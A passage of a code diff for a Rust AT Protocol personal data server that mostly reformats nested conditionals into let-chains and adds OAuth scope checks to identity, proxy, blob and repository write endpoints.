"AccountAlreadyExists", 680 + "message": "An account with this DID already exists" 681 + })), 682 + ) 683 + .into_response(); 668 684 } 685 + } 669 686 error!("Error inserting user: {:?}", e); 670 687 return ( 671 688 StatusCode::INTERNAL_SERVER_ERROR, ··· 675 692 } 676 693 }; 677 694 678 - if !is_migration { 679 - if let Err(e) = sqlx::query!( 695 + if !is_migration 696 + && let Err(e) = sqlx::query!( 680 697 "INSERT INTO channel_verifications (user_id, channel, code, pending_identifier, expires_at) VALUES ($1, 'email', $2, $3, $4)", 681 698 user_id, 682 699 verification_code, ··· 692 709 ) 693 710 .into_response(); 694 711 } 695 - } 696 712 let encrypted_key_bytes = match crate::config::encrypt_key(&secret_key_bytes) { 697 713 Ok(enc) => enc, 698 714 Err(e) => { ··· 809 825 ) 810 826 .into_response(); 811 827 } 812 - if let Some(code) = &input.invite_code { 813 - if !code.trim().is_empty() { 814 - let use_insert = sqlx::query!( 815 - "INSERT INTO invite_code_uses (code, used_by_user) VALUES ($1, $2)", 816 - code, 817 - user_id 828 + if let Some(code) = &input.invite_code 829 + && !code.trim().is_empty() 830 + { 831 + let use_insert = sqlx::query!( 832 + "INSERT INTO invite_code_uses (code, used_by_user) VALUES ($1, $2)", 833 + code, 834 + user_id 835 + ) 836 + .execute(&mut *tx) 837 + .await; 838 + if let Err(e) = use_insert { 839 + error!("Error recording invite usage: {:?}", e); 840 + return ( 841 + StatusCode::INTERNAL_SERVER_ERROR, 842 + Json(json!({"error": "InternalError"})), 818 843 ) 819 - .execute(&mut *tx) 820 - .await; 821 - if let Err(e) = use_insert { 822 - error!("Error recording invite usage: {:?}", e); 823 - return ( 824 - StatusCode::INTERNAL_SERVER_ERROR, 825 - Json(json!({"error": "InternalError"})), 826 - ) 827 - .into_response(); 828 - } 844 + .into_response(); 829 845 } 830 846 } 831 847 if let Err(e) = tx.commit().await { ··· 838 854 } 839 855 if !is_migration { 840 856 if let Err(e) = 841 - crate::api::repo::record::sequence_identity_event(&state, &did, Some(&full_handle)).await 857 + crate::api::repo::record::sequence_identity_event(&state, &did, Some(&full_handle)) 858 + .await 842 859 { 843 860 warn!("Failed to sequence identity event for {}: {}", did, e); 844 861 } 845 - if let Err(e) = crate::api::repo::record::sequence_account_event(&state, &did, true, None).await 862 + if let Err(e) = 863 + crate::api::repo::record::sequence_account_event(&state, &did, true, None).await 846 864 { 847 865 warn!("Failed to sequence account event for {}: {}", did, e); 848 866 } ··· 861 879 { 862 880 warn!("Failed to create default profile for {}: {}", did, e); 863 881 } 864 - if let Some(ref recipient) = verification_recipient { 865 - if let Err(e) = crate::comms::enqueue_signup_verification( 882 + if let Some(ref recipient) = verification_recipient 883 + && let Err(e) = crate::comms::enqueue_signup_verification( 866 884 &state.db, 867 885 user_id, 868 886 verification_channel, ··· 870 888 &verification_code, 871 889 ) 872 890 .await 873 - { 874 - warn!( 875 - "Failed to enqueue signup verification notification: {:?}", 876 - e 877 - ); 878 - } 891 + { 892 + warn!( 893 + "Failed to enqueue signup verification notification: {:?}", 894 + e 895 + ); 879 896 } 880 897 } 881 898
+37 -25
src/api/identity/did.rs
··· 54 54 .await; 55 55 (StatusCode::OK, Json(json!({ "did": row.did }))).into_response() 56 56 } 57 - Ok(None) => { 58 - match crate::handle::resolve_handle(handle).await { 59 - Ok(did) => { 60 - let _ = state 61 - .cache 62 - .set(&cache_key, &did, std::time::Duration::from_secs(300)) 63 - .await; 64 - (StatusCode::OK, Json(json!({ "did": did }))).into_response() 65 - } 66 - Err(_) => ( 67 - StatusCode::NOT_FOUND, 68 - Json(json!({"error": "HandleNotFound", "message": "Unable to resolve handle"})), 69 - ) 70 - .into_response(), 57 + Ok(None) => match crate::handle::resolve_handle(handle).await { 58 + Ok(did) => { 59 + let _ = state 60 + .cache 61 + .set(&cache_key, &did, std::time::Duration::from_secs(300)) 62 + .await; 63 + (StatusCode::OK, Json(json!({ "did": did }))).into_response() 71 64 } 72 - } 65 + Err(_) => ( 66 + StatusCode::NOT_FOUND, 67 + Json(json!({"error": "HandleNotFound", "message": "Unable to resolve handle"})), 68 + ) 69 + .into_response(), 70 + }, 73 71 Err(e) => { 74 72 error!("DB error resolving handle: {:?}", e); 75 73 ( ··· 310 308 .into_response(); 311 309 } 312 310 }; 313 - let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 314 - Ok(user) => user, 315 - Err(e) => return ApiError::from(e).into_response(), 316 - }; 311 + let auth_user = 312 + match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 313 + Ok(user) => user, 314 + Err(e) => return ApiError::from(e).into_response(), 315 + }; 317 316 let user = match sqlx::query!( 318 317 "SELECT handle FROM users u JOIN user_keys k ON u.id = k.user_id WHERE u.did = $1", 319 318 auth_user.did ··· 378 377 Some(t) => t, 379 378 None => return ApiError::AuthenticationRequired.into_response(), 380 379 }; 381 - let did = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 382 - Ok(user) => user.did, 383 - Err(e) => return ApiError::from(e).into_response(), 384 - }; 380 + let auth_user = 381 + match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 382 + Ok(user) => user, 383 + Err(e) => return ApiError::from(e).into_response(), 384 + }; 385 + if let Err(e) = crate::auth::scope_check::check_identity_scope( 386 + auth_user.is_oauth, 387 + auth_user.scope.as_deref(), 388 + crate::oauth::scopes::IdentityAttr::Handle, 389 + ) { 390 + return e; 391 + } 392 + let did = auth_user.did; 385 393 let user_id = match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 386 394 .fetch_optional(&state.db) 387 395 .await ··· 414 422 } else { 415 423 new_handle 416 424 }; 417 - (short_handle.to_string(), format!("{}.{}", short_handle, hostname)) 425 + ( 426 + short_handle.to_string(), 427 + format!("{}.{}", short_handle, hostname), 428 + ) 418 429 } else { 419 430 match crate::handle::verify_handle_ownership(new_handle, &did).await { 420 431 Ok(()) => {} ··· 537 548 let plc_client = crate::plc::PlcClient::new(None); 538 549 let last_op = plc_client.get_last_op(did).await?; 539 550 let new_also_known_as = vec![format!("at://{}", new_handle)]; 540 - let update_op = crate::plc::create_update_op(&last_op, None, None, Some(new_also_known_as), None)?; 551 + let update_op = 552 + crate::plc::create_update_op(&last_op, None, None, Some(new_also_known_as), None)?; 541 553 let signed_op = crate::plc::sign_operation(&update_op, &signing_key)?; 542 554 plc_client.send_operation(did, &signed_op).await?; 543 555 Ok(())
+12 -4
src/api/identity/plc/request.rs
··· 24 24 Some(t) => t, 25 25 None => return ApiError::AuthenticationRequired.into_response(), 26 26 }; 27 - let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 28 - Ok(user) => user, 29 - Err(e) => return ApiError::from(e).into_response(), 30 - }; 27 + let auth_user = 28 + match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 29 + Ok(user) => user, 30 + Err(e) => return ApiError::from(e).into_response(), 31 + }; 32 + if let Err(e) = crate::auth::scope_check::check_identity_scope( 33 + auth_user.is_oauth, 34 + auth_user.scope.as_deref(), 35 + crate::oauth::scopes::IdentityAttr::Wildcard, 36 + ) { 37 + return e; 38 + } 31 39 let user = match sqlx::query!("SELECT id FROM users WHERE did = $1", auth_user.did) 32 40 .fetch_optional(&state.db) 33 41 .await
+12 -4
src/api/identity/plc/sign.rs
··· 50 50 Some(t) => t, 51 51 None => return ApiError::AuthenticationRequired.into_response(), 52 52 }; 53 - let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &bearer).await { 54 - Ok(user) => user, 55 - Err(e) => return ApiError::from(e).into_response(), 56 - }; 53 + let auth_user = 54 + match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &bearer).await { 55 + Ok(user) => user, 56 + Err(e) => return ApiError::from(e).into_response(), 57 + }; 58 + if let Err(e) = crate::auth::scope_check::check_identity_scope( 59 + auth_user.is_oauth, 60 + auth_user.scope.as_deref(), 61 + crate::oauth::scopes::IdentityAttr::Wildcard, 62 + ) { 63 + return e; 64 + } 57 65 let did = &auth_user.did; 58 66 let token = match &input.token { 59 67 Some(t) => t,
+71 -58
src/api/identity/plc/submit.rs
··· 29 29 Some(t) => t, 30 30 None => return ApiError::AuthenticationRequired.into_response(), 31 31 }; 32 - let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &bearer).await { 33 - Ok(user) => user, 34 - Err(e) => return ApiError::from(e).into_response(), 35 - }; 32 + let auth_user = 33 + match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &bearer).await { 34 + Ok(user) => user, 35 + Err(e) => return ApiError::from(e).into_response(), 36 + }; 37 + if let Err(e) = crate::auth::scope_check::check_identity_scope( 38 + auth_user.is_oauth, 39 + auth_user.scope.as_deref(), 40 + crate::oauth::scopes::IdentityAttr::Wildcard, 41 + ) { 42 + return e; 43 + } 36 44 let did = &auth_user.did; 37 45 if let Err(e) = validate_plc_operation(&input.operation) { 38 46 return ApiError::InvalidRequest(format!("Invalid operation: {}", e)).into_response(); ··· 40 48 let op = &input.operation; 41 49 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 42 50 let public_url = format!("https://{}", hostname); 43 - let user = match sqlx::query!("SELECT id, handle, deactivated_at FROM users WHERE did = $1", did) 44 - .fetch_optional(&state.db) 45 - .await 51 + let user = match sqlx::query!( 52 + "SELECT id, handle, deactivated_at FROM users WHERE did = $1", 53 + did 54 + ) 55 + .fetch_optional(&state.db) 56 + .await 46 57 { 47 58 Ok(Some(row)) => row, 48 59 _ => { ··· 94 105 } 95 106 }; 96 107 let user_did_key = signing_key_to_did_key(&signing_key); 97 - if !is_migration { 98 - if let Some(rotation_keys) = op.get("rotationKeys").and_then(|v| v.as_array()) { 99 - let server_rotation_key = 100 - std::env::var("PLC_ROTATION_KEY").unwrap_or_else(|_| user_did_key.clone()); 101 - let has_server_key = rotation_keys 102 - .iter() 103 - .any(|k| k.as_str() == Some(&server_rotation_key)); 104 - if !has_server_key { 105 - return ( 106 - StatusCode::BAD_REQUEST, 107 - Json(json!({ 108 - "error": "InvalidRequest", 109 - "message": "Rotation keys do not include server's rotation key" 110 - })), 111 - ) 112 - .into_response(); 113 - } 108 + if !is_migration && let Some(rotation_keys) = op.get("rotationKeys").and_then(|v| v.as_array()) 109 + { 110 + let server_rotation_key = 111 + std::env::var("PLC_ROTATION_KEY").unwrap_or_else(|_| user_did_key.clone()); 112 + let has_server_key = rotation_keys 113 + .iter() 114 + .any(|k| k.as_str() == Some(&server_rotation_key)); 115 + if !has_server_key { 116 + return ( 117 + StatusCode::BAD_REQUEST, 118 + Json(json!({ 119 + "error": "InvalidRequest", 120 + "message": "Rotation keys do not include server's rotation key" 121 + })), 122 + ) 123 + .into_response(); 114 124 } 115 125 } 116 126 if let Some(services) = op.get("services").and_then(|v| v.as_object()) 117 - && let Some(pds) = services.get("atproto_pds").and_then(|v| v.as_object()) { 118 - let service_type = pds.get("type").and_then(|v| v.as_str()); 119 - let endpoint = pds.get("endpoint").and_then(|v| v.as_str()); 120 - if service_type != Some("AtprotoPersonalDataServer") { 121 - return ( 122 - StatusCode::BAD_REQUEST, 123 - Json(json!({ 124 - "error": "InvalidRequest", 125 - "message": "Incorrect type on atproto_pds service" 126 - })), 127 - ) 128 - .into_response(); 129 - } 130 - if endpoint != Some(&public_url) { 131 - return ( 132 - StatusCode::BAD_REQUEST, 133 - Json(json!({ 134 - "error": "InvalidRequest", 135 - "message": "Incorrect endpoint on atproto_pds service" 136 - })), 137 - ) 138 - .into_response(); 139 - } 127 + && let Some(pds) = services.get("atproto_pds").and_then(|v| v.as_object()) 128 + { 129 + let service_type = pds.get("type").and_then(|v| v.as_str()); 130 + let endpoint = pds.get("endpoint").and_then(|v| v.as_str()); 131 + if service_type != Some("AtprotoPersonalDataServer") { 132 + return ( 133 + StatusCode::BAD_REQUEST, 134 + Json(json!({ 135 + "error": "InvalidRequest", 136 + "message": "Incorrect type on atproto_pds service" 137 + })), 138 + ) 139 + .into_response(); 140 140 } 141 + if endpoint != Some(&public_url) { 142 + return ( 143 + StatusCode::BAD_REQUEST, 144 + Json(json!({ 145 + "error": "InvalidRequest", 146 + "message": "Incorrect endpoint on atproto_pds service" 147 + })), 148 + ) 149 + .into_response(); 150 + } 151 + } 141 152 if !is_migration { 142 - if let Some(verification_methods) = op.get("verificationMethods").and_then(|v| v.as_object()) 153 + if let Some(verification_methods) = 154 + op.get("verificationMethods").and_then(|v| v.as_object()) 143 155 && let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str()) 144 - && atproto_key != user_did_key { 145 - return ( 146 - StatusCode::BAD_REQUEST, 147 - Json(json!({ 148 - "error": "InvalidRequest", 149 - "message": "Incorrect signing key in verificationMethods" 150 - })), 151 - ) 152 - .into_response(); 153 - } 156 + && atproto_key != user_did_key 157 + { 158 + return ( 159 + StatusCode::BAD_REQUEST, 160 + Json(json!({ 161 + "error": "InvalidRequest", 162 + "message": "Incorrect signing key in verificationMethods" 163 + })), 164 + ) 165 + .into_response(); 166 + } 154 167 if let Some(also_known_as) = op.get("alsoKnownAs").and_then(|v| v.as_array()) { 155 168 let expected_handle = format!("at://{}", user.handle); 156 169 let first_aka = also_known_as.first().and_then(|v| v.as_str());
+72 -46
src/api/notification_prefs.rs
··· 147 147 } 148 148 }; 149 149 150 - let user_id: uuid::Uuid = match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", user.did) 151 - .fetch_one(&state.db) 152 - .await 153 - { 154 - Ok(id) => id, 155 - Err(e) => return ( 156 - StatusCode::INTERNAL_SERVER_ERROR, 157 - Json(json!({"error": "InternalError", "message": format!("Database error: {}", e)})), 158 - ) 159 - .into_response(), 160 - }; 150 + let user_id: uuid::Uuid = 151 + match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", user.did) 152 + .fetch_one(&state.db) 153 + .await 154 + { 155 + Ok(id) => id, 156 + Err(e) => return ( 157 + StatusCode::INTERNAL_SERVER_ERROR, 158 + Json( 159 + json!({"error": "InternalError", "message": format!("Database error: {}", e)}), 160 + ), 161 + ) 162 + .into_response(), 163 + }; 161 164 162 - let rows = match sqlx::query!( 163 - r#" 165 + let rows = 166 + match sqlx::query!( 167 + r#" 164 168 SELECT 165 169 created_at, 166 170 channel as "channel: String", ··· 173 177 ORDER BY created_at DESC 174 178 LIMIT 50 175 179 "#, 176 - user_id 177 - ) 178 - .fetch_all(&state.db) 179 - .await 180 - { 181 - Ok(r) => r, 182 - Err(e) => return ( 183 - StatusCode::INTERNAL_SERVER_ERROR, 184 - Json(json!({"error": "InternalError", "message": format!("Database error: {}", e)})), 180 + user_id 185 181 ) 186 - .into_response(), 187 - }; 182 + .fetch_all(&state.db) 183 + .await 184 + { 185 + Ok(r) => r, 186 + Err(e) => return ( 187 + StatusCode::INTERNAL_SERVER_ERROR, 188 + Json( 189 + json!({"error": "InternalError", "message": format!("Database error: {}", e)}), 190 + ), 191 + ) 192 + .into_response(), 193 + }; 188 194 189 - let notifications = rows.iter().map(|row| { 190 - NotificationHistoryEntry { 195 + let notifications = rows 196 + .iter() 197 + .map(|row| NotificationHistoryEntry { 191 198 created_at: row.created_at.to_rfc3339(), 192 199 channel: row.channel.clone(), 193 200 comms_type: row.comms_type.clone(), 194 201 status: row.status.clone(), 195 202 subject: row.subject.clone(), 196 203 body: row.body.clone(), 197 - } 198 - }).collect(); 204 + }) 205 + .collect(); 199 206 200 207 Json(GetNotificationHistoryResponse { notifications }).into_response() 201 208 } ··· 297 304 } 298 305 }; 299 306 300 - let user_row = match sqlx::query!( 301 - "SELECT id, handle, email FROM users WHERE did = $1", 302 - user.did 303 - ) 304 - .fetch_one(&state.db) 305 - .await 306 - { 307 - Ok(row) => row, 308 - Err(e) => return ( 309 - StatusCode::INTERNAL_SERVER_ERROR, 310 - Json(json!({"error": "InternalError", "message": format!("Database error: {}", e)})), 307 + let user_row = 308 + match sqlx::query!( 309 + "SELECT id, handle, email FROM users WHERE did = $1", 310 + user.did 311 311 ) 312 - .into_response(), 313 - }; 312 + .fetch_one(&state.db) 313 + .await 314 + { 315 + Ok(row) => row, 316 + Err(e) => return ( 317 + StatusCode::INTERNAL_SERVER_ERROR, 318 + Json( 319 + json!({"error": "InternalError", "message": format!("Database error: {}", e)}), 320 + ), 321 + ) 322 + .into_response(), 323 + }; 314 324 315 325 let user_id = user_row.id; 316 326 let handle = user_row.handle; ··· 384 394 .into_response(); 385 395 } 386 396 387 - if let Err(e) = request_channel_verification(&state.db, user_id, "email", &email_clean, Some(&handle)).await { 397 + if let Err(e) = request_channel_verification( 398 + &state.db, 399 + user_id, 400 + "email", 401 + &email_clean, 402 + Some(&handle), 403 + ) 404 + .await 405 + { 388 406 return ( 389 407 StatusCode::INTERNAL_SERVER_ERROR, 390 408 Json(json!({"error": "InternalError", "message": e})), ··· 419 437 .await; 420 438 info!(did = %user.did, "Cleared Discord ID"); 421 439 } else { 422 - if let Err(e) = request_channel_verification(&state.db, user_id, "discord", discord_id, None).await { 440 + if let Err(e) = 441 + request_channel_verification(&state.db, user_id, "discord", discord_id, None).await 442 + { 423 443 return ( 424 444 StatusCode::INTERNAL_SERVER_ERROR, 425 445 Json(json!({"error": "InternalError", "message": e})), ··· 455 475 .await; 456 476 info!(did = %user.did, "Cleared Telegram username"); 457 477 } else { 458 - if let Err(e) = request_channel_verification(&state.db, user_id, "telegram", telegram_clean, None).await { 478 + if let Err(e) = 479 + request_channel_verification(&state.db, user_id, "telegram", telegram_clean, None) 480 + .await 481 + { 459 482 return ( 460 483 StatusCode::INTERNAL_SERVER_ERROR, 461 484 Json(json!({"error": "InternalError", "message": e})), ··· 490 513 .await; 491 514 info!(did = %user.did, "Cleared Signal number"); 492 515 } else { 493 - if let Err(e) = request_channel_verification(&state.db, user_id, "signal", signal, None).await { 516 + if let Err(e) = 517 + request_channel_verification(&state.db, user_id, "signal", signal, None).await 518 + { 494 519 return ( 495 520 StatusCode::INTERNAL_SERVER_ERROR, 496 521 Json(json!({"error": "InternalError", "message": e})), ··· 505 530 Json(UpdateNotificationPrefsResponse { 506 531 success: true, 507 532 verification_required, 508 - }).into_response() 533 + }) 534 + .into_response() 509 535 }
+10 -4
src/api/proxy.rs
··· 18 18 RawQuery(query): RawQuery, 19 19 body: Bytes, 20 20 ) -> Response { 21 - let proxy_header = match headers 22 - .get("atproto-proxy") 23 - .and_then(|h| h.to_str().ok()) 24 - { 21 + let proxy_header = match headers.get("atproto-proxy").and_then(|h| h.to_str().ok()) { 25 22 Some(h) => h.to_string(), 26 23 None => { 27 24 return ( ··· 66 63 ) { 67 64 match crate::auth::validate_bearer_token(&state.db, &token).await { 68 65 Ok(auth_user) => { 66 + if let Err(e) = crate::auth::scope_check::check_rpc_scope( 67 + auth_user.is_oauth, 68 + auth_user.scope.as_deref(), 69 + &resolved.did, 70 + &method, 71 + ) { 72 + return e; 73 + } 74 + 69 75 if let Some(key_bytes) = auth_user.key_bytes { 70 76 match crate::auth::create_service_token( 71 77 &auth_user.did,
+31 -20
src/api/repo/blob.rs
··· 62 62 } else { 63 63 match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 64 64 Ok(user) => { 65 + let mime_type_for_check = headers 66 + .get("content-type") 67 + .and_then(|h| h.to_str().ok()) 68 + .unwrap_or("application/octet-stream"); 69 + if let Err(e) = crate::auth::scope_check::check_blob_scope( 70 + user.is_oauth, 71 + user.scope.as_deref(), 72 + mime_type_for_check, 73 + ) { 74 + return e; 75 + } 65 76 let deactivated = sqlx::query_scalar!( 66 77 "SELECT deactivated_at FROM users WHERE did = $1", 67 78 user.did ··· 171 182 .blob_store 172 183 .put_bytes(&storage_key, bytes::Bytes::from(data)) 173 184 .await 174 - { 175 - error!("Failed to upload blob to storage: {:?}", e); 176 - return ( 177 - StatusCode::INTERNAL_SERVER_ERROR, 178 - Json(json!({"error": "InternalError", "message": "Failed to store blob"})), 179 - ) 180 - .into_response(); 181 - } 185 + { 186 + error!("Failed to upload blob to storage: {:?}", e); 187 + return ( 188 + StatusCode::INTERNAL_SERVER_ERROR, 189 + Json(json!({"error": "InternalError", "message": "Failed to store blob"})), 190 + ) 191 + .into_response(); 192 + } 182 193 if let Err(e) = tx.commit().await { 183 194 error!("Failed to commit blob transaction: {:?}", e); 184 - if was_inserted 185 - && let Err(cleanup_err) = state.blob_store.delete(&storage_key).await { 186 - error!( 187 - "Failed to cleanup orphaned blob {}: {:?}", 188 - storage_key, cleanup_err 189 - ); 190 - } 195 + if was_inserted && let Err(cleanup_err) = state.blob_store.delete(&storage_key).await { 196 + error!( 197 + "Failed to cleanup orphaned blob {}: {:?}", 198 + storage_key, cleanup_err 199 + ); 200 + } 191 201 return ( 192 202 StatusCode::INTERNAL_SERVER_ERROR, 193 203 Json(json!({"error": "InternalError"})), ··· 231 241 if let Some(obj) = val.as_object() { 232 242 if let Some(type_val) = obj.get("$type") 233 243 && type_val == "blob" 234 - && let Some(r) = obj.get("ref") 235 - && let Some(link) = r.get("$link") 236 - && let Some(s) = link.as_str() { 237 - blobs.push(s.to_string()); 238 - } 244 + && let Some(r) = obj.get("ref") 245 + && let Some(link) = r.get("$link") 246 + && let Some(s) = link.as_str() 247 + { 248 + blobs.push(s.to_string()); 249 + } 239 250 for (_, v) in obj { 240 251 find_blobs(v, blobs); 241 252 }
+30 -5
src/api/repo/import.rs
··· 53 53 Some(t) => t, 54 54 None => return ApiError::AuthenticationRequired.into_response(), 55 55 }; 56 - let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 57 - Ok(user) => user, 58 - Err(e) => return ApiError::from(e).into_response(), 59 - }; 56 + let auth_user = 57 + match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 58 + Ok(user) => user, 59 + Err(e) => return ApiError::from(e).into_response(), 60 + }; 60 61 let did = &auth_user.did; 61 62 let user = match sqlx::query!( 62 - "SELECT id, deactivated_at, takedown_ref FROM users WHERE did = $1", 63 + "SELECT id, handle, deactivated_at, takedown_ref FROM users WHERE did = $1", 63 64 did 64 65 ) 65 66 .fetch_optional(&state.db) ··· 317 318 records.len(), 318 319 did 319 320 ); 321 + if is_migration { 322 + if let Err(e) = 323 + sqlx::query!("UPDATE users SET deactivated_at = NULL WHERE did = $1", did) 324 + .execute(&state.db) 325 + .await 326 + { 327 + error!("Failed to reactivate account after import: {:?}", e); 328 + } 329 + let _ = state.cache.delete(&format!("handle:{}", user.handle)).await; 330 + if let Err(e) = crate::api::repo::record::sequence_identity_event( 331 + &state, 332 + did, 333 + Some(&user.handle), 334 + ) 335 + .await 336 + { 337 + warn!("Failed to sequence identity event after import: {:?}", e); 338 + } 339 + if let Err(e) = 340 + crate::api::repo::record::sequence_account_event(&state, did, true, None).await 341 + { 342 + warn!("Failed to sequence account event after import: {:?}", e); 343 + } 344 + } 320 345 if let Err(e) = sequence_import_event(&state, did, &root.to_string()).await { 321 346 warn!("Failed to sequence import event: {:?}", e); 322 347 }
+93 -15
src/api/repo/record/batch.rs
··· 101 101 .into_response(); 102 102 } 103 103 }; 104 - let did = auth_user.did; 104 + let did = auth_user.did.clone(); 105 + let is_oauth = auth_user.is_oauth; 106 + let scope = auth_user.scope; 105 107 if input.repo != did { 106 108 return ( 107 109 StatusCode::FORBIDDEN, ··· 144 146 ) 145 147 .into_response(); 146 148 } 149 + 150 + if is_oauth { 151 + use std::collections::HashSet; 152 + let create_collections: HashSet<&str> = input 153 + .writes 154 + .iter() 155 + .filter_map(|w| { 156 + if let WriteOp::Create { collection, .. } = w { 157 + Some(collection.as_str()) 158 + } else { 159 + None 160 + } 161 + }) 162 + .collect(); 163 + let update_collections: HashSet<&str> = input 164 + .writes 165 + .iter() 166 + .filter_map(|w| { 167 + if let WriteOp::Update { collection, .. } = w { 168 + Some(collection.as_str()) 169 + } else { 170 + None 171 + } 172 + }) 173 + .collect(); 174 + let delete_collections: HashSet<&str> = input 175 + .writes 176 + .iter() 177 + .filter_map(|w| { 178 + if let WriteOp::Delete { collection, .. } = w { 179 + Some(collection.as_str()) 180 + } else { 181 + None 182 + } 183 + }) 184 + .collect(); 185 + 186 + for collection in create_collections { 187 + if let Err(e) = crate::auth::scope_check::check_repo_scope( 188 + is_oauth, 189 + scope.as_deref(), 190 + crate::oauth::RepoAction::Create, 191 + collection, 192 + ) { 193 + return e; 194 + } 195 + } 196 + for collection in update_collections { 197 + if let Err(e) = crate::auth::scope_check::check_repo_scope( 198 + is_oauth, 199 + scope.as_deref(), 200 + crate::oauth::RepoAction::Update, 201 + collection, 202 + ) { 203 + return e; 204 + } 205 + } 206 + for collection in delete_collections { 207 + if let Err(e) = crate::auth::scope_check::check_repo_scope( 208 + is_oauth, 209 + scope.as_deref(), 210 + crate::oauth::RepoAction::Delete, 211 + collection, 212 + ) { 213 + return e; 214 + } 215 + } 216 + } 217 + 147 218 let user_id: uuid::Uuid = match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 148 219 .fetch_optional(&state.db) 149 220 .await ··· 184 255 } 185 256 }; 186 257 if let Some(swap_commit) = &input.swap_commit 187 - && Cid::from_str(swap_commit).ok() != Some(current_root_cid) { 188 - return ( 189 - StatusCode::CONFLICT, 190 - Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 191 - ) 192 - .into_response(); 193 - } 258 + && Cid::from_str(swap_commit).ok() != Some(current_root_cid) 259 + { 260 + return ( 261 + StatusCode::CONFLICT, 262 + Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 263 + ) 264 + .into_response(); 265 + } 194 266 let tracking_store = TrackingBlockStore::new(state.block_store.clone()); 195 267 let commit_bytes = match tracking_store.get(&current_root_cid).await { 196 268 Ok(Some(b)) => b, ··· 225 297 value, 226 298 } => { 227 299 if input.validate.unwrap_or(true) 228 - && let Err(err_response) = validate_record(value, collection) { 229 - return *err_response; 230 - } 300 + && let Err(err_response) = validate_record(value, collection) 301 + { 302 + return *err_response; 303 + } 231 304 let rkey = rkey 232 305 .clone() 233 306 .unwrap_or_else(|| Tid::now(LimitedU32::MIN).to_string()); ··· 276 349 value, 277 350 } => { 278 351 if input.validate.unwrap_or(true) 279 - && let Err(err_response) = validate_record(value, collection) { 280 - return *err_response; 281 - } 352 + && let Err(err_response) = validate_record(value, collection) 353 + { 354 + return *err_response; 355 + } 282 356 let mut record_bytes = Vec::new(); 283 357 if serde_ipld_dagcbor::to_writer(&mut record_bytes, value).is_err() { 284 358 return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidRecord", "message": "Failed to serialize record"}))).into_response(); ··· 353 427 }; 354 428 let mut relevant_blocks = std::collections::BTreeMap::new(); 355 429 for key in &modified_keys { 356 - if mst.blocks_for_path(key, &mut relevant_blocks).await.is_err() { 430 + if mst 431 + .blocks_for_path(key, &mut relevant_blocks) 432 + .await 433 + .is_err() 434 + { 357 435 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response(); 358 436 } 359 437 if original_mst
+33 -10
src/api/repo/record/delete.rs
··· 34 34 axum::extract::OriginalUri(uri): axum::extract::OriginalUri, 35 35 Json(input): Json<DeleteRecordInput>, 36 36 ) -> Response { 37 - let (did, user_id, current_root_cid) = 37 + let auth = 38 38 match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await { 39 39 Ok(res) => res, 40 40 Err(err_res) => return err_res, 41 41 }; 42 + 43 + if let Err(e) = crate::auth::scope_check::check_repo_scope( 44 + auth.is_oauth, 45 + auth.scope.as_deref(), 46 + crate::oauth::RepoAction::Delete, 47 + &input.collection, 48 + ) { 49 + return e; 50 + } 51 + 52 + let did = auth.did; 53 + let user_id = auth.user_id; 54 + let current_root_cid = auth.current_root_cid; 55 + 42 56 if let Some(swap_commit) = &input.swap_commit 43 - && Cid::from_str(swap_commit).ok() != Some(current_root_cid) { 44 - return ( 45 - StatusCode::CONFLICT, 46 - Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 47 - ) 48 - .into_response(); 49 - } 57 + && Cid::from_str(swap_commit).ok() != Some(current_root_cid) 58 + { 59 + return ( 60 + StatusCode::CONFLICT, 61 + Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 62 + ) 63 + .into_response(); 64 + } 50 65 let tracking_store = TrackingBlockStore::new(state.block_store.clone()); 51 66 let commit_bytes = match tracking_store.get(&current_root_cid).await { 52 67 Ok(Some(b)) => b, ··· 115 130 prev: prev_record_cid, 116 131 }; 117 132 let mut relevant_blocks = std::collections::BTreeMap::new(); 118 - if new_mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() { 133 + if new_mst 134 + .blocks_for_path(&key, &mut relevant_blocks) 135 + .await 136 + .is_err() 137 + { 119 138 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response(); 120 139 } 121 - if mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() { 140 + if mst 141 + .blocks_for_path(&key, &mut relevant_blocks) 142 + .await 143 + .is_err() 144 + { 122 145 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response(); 123 146 } 124 147 let mut written_cids = tracking_store.get_all_relevant_cids();
+19 -19
src/api/repo/record/read.rs
